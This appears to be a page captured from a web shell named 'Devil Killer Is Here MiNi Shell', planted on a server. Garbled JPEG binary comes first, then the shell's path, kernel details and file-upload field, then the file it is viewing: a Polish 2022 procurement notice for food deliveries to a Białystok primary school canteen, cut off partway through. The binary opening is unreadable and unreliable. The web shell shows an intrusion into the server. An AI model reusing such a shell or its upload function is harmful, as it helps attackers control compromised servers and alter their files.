JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220610/0020479201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy artykułów spożywczych do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA NR 28 IM. KONSTANTEGO ILDEFONSA GAŁCZYŃSKIEGO W BIAŁYMSTOKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000735658</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul.Warmińska 55</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-553</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sp28@um.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sp28bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy artykułów spożywczych do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e36781b-e89b-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00204792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00203105/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywne dostawy artykułów spożywczych do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok (z podziałem na części)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/df36163a-8b07-4b0a-b937-588070c99f00 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: sp28@um.bialystok.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały: w „Instrukcji Użytkownika systemu https://miniportal.uzp.gov.pl/” dostępnej pod adresem internetowym:<br/>https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf . Wykonawca akceptuje warunki korzystania z miniPortalu określone w „Instrukcji Użytkownika systemu https://miniportal.uzp.gov.pl/” oraz zobowiązuje się korzystając z mini-Portalu przestrzegać jej postanowień. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Za datę przekazania<br/>wniosków, zawiadomień, oświadczeń lub dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP lub poczty elektronicznej: sp28@um.bialystok.pl (nie dotyczy składanych ofert). Wykonawca składa Ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty<br/>lub wniosku dostępnego na ePUAP https://obywatel.gov.pl/nforms/ezamowienia) i udostępnionego<br/>również na miniPortalu w zakładce „Formularze do komunikacji”. <br/>Wykonawca, aby zaszyfrować podpisany wcześniej plik (kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym), musi wejść w przedmiotowe postępowanie dostępne na stronie internetowej prowadzonego postępowania:<br/>https://miniportal.uzp.gov.pl/Postepowania/df36163a-8b07-4b0a-b937-588070c99f00. Po wejściu w jego szczegóły Wykonawca odnajdzie przycisk umożliwiający szyfrowanie. System miniPortal automatycznie zapamiętuje, w którym postępowaniu Wykonawca zaszyfrował ofertę. Tak przygotowany plik należy przesłać przez Formularz do złożenia, zmiany, wycofania oferty lub wniosku. W Formularzu oferty Wykonawca powinien podać adres skrzynki ePUAP, adres poczty elektronicznej: e-mail na którym prowadzona<br/>będzie korespondencja związana z postępowaniem. Ofertę składa się pod rygorem nieważności w formie elektronicznej (tj. opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (z zachowaniem postaci elektronicznej w formacie danych takich jak np.: .pdf, .doc, .docx, .rtf, .xps, .odt.). Sposób złożenia Oferty, w tym zaszyfrowania oferty opisany został powyżej oraz w „Instrukcji użytkownika systemu”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 i 14 RODO, Zamawiający informuje, że:<br/>1) administratorem danych osobowych zawartych w ofercie oraz we wszelkich innych dokumentach składanych przez wykonawcę w<br/>postępowaniu o udzielenie niniejszego zamówienia publicznego jest Szkoła Podstawowa nr 28 im. K. I. Gałczyńskiego ul. Warmińska 55, 15-553 Białystok zwana dalej Administratorem;<br/>2) administrator wyznaczył inspektora ochrony danych osobowych, z którym można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych. Dane do kontaktu z inspektorem: kontakt@eterneco.eu, adres korespondencyjny: Szkoła Podstawowa nr 28 im. K. I. Gałczyńskiego ul. Warmińska 55, 15-553 Białystok;<br/>3) dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego pt. „Sukcesywne dostawy artykułów spożywczych do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok” ZP-01/SP28/22;<br/>4) Dane mogą być przetwarzane na podstawie: art. 6 ust. 1 lit. c RODO, art.6 ust.1 lit. b RODO, art. 6 ust.1 lit. f RODO. Pełna klauzula informacyjna została zamieszczona w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-01/SP28/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Dostawa pieczywa.<br/>1)	Część 1 zamówienia obejmuje sukcesywną dostawę pieczywa do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości pieczywa oraz szczegółowy opis przedmiotu Części 1 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 1 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Z zastrzeżeniem pkt 2, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 1 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 1 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 1 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 1 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w okolicznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 1 zamówienia, wskazanego w Formularzu cenowym dla Części 1 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 1 zamówienia, wskazanego w Formularzu cenowym dla Części 1 zamówienia. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Dostawa różnych artykułów spożywczych.<br/>1)	Część 2 zamówienia obejmuje sukcesywną dostawę różnych artykułów spożywczych do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości różnych artykułów spożywczych oraz szczegółowy opis przedmiotu Części 2 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 2 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Z zastrzeżeniem pkt 2, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 2 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 2 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 2 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 2 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w okolicznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 2 zamówienia, wskazanego w Formularzu cenowym dla Części 2 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 2 zamówienia, wskazanego w Formularzu cenowym dla Części 2 zamówienia. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Dostawa mięsa i wyrobów mięsnych.<br/>1)	Część 3 zamówienia obejmuje sukcesywną dostawę mięsa i wyrobów mięsnych do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości mięsa i wyrobów mięsnych oraz szczegółowy opis przedmiotu Części 3 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 3 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Z zastrzeżeniem pkt 2, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 3 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 3 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 3 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 3 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w oko-licznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 3 zamówienia, wskazanego w Formularzu cenowym dla Części 3 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 3 zamówienia, wskazanego w Formularzu cenowym dla Części 3 zamówienia. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Dostawa mięsa drobiowego i wędlin.<br/>1)	Część 4 zamówienia obejmuje sukcesywną dostawę mięsa drobiowego i wędlin do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości mięsa drobiowego i wędlin oraz szczegółowy opis przedmiotu Części 4 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 4 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Z zastrzeżeniem pkt 2, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 4 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 4 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 4 zamówienia, wskazanego 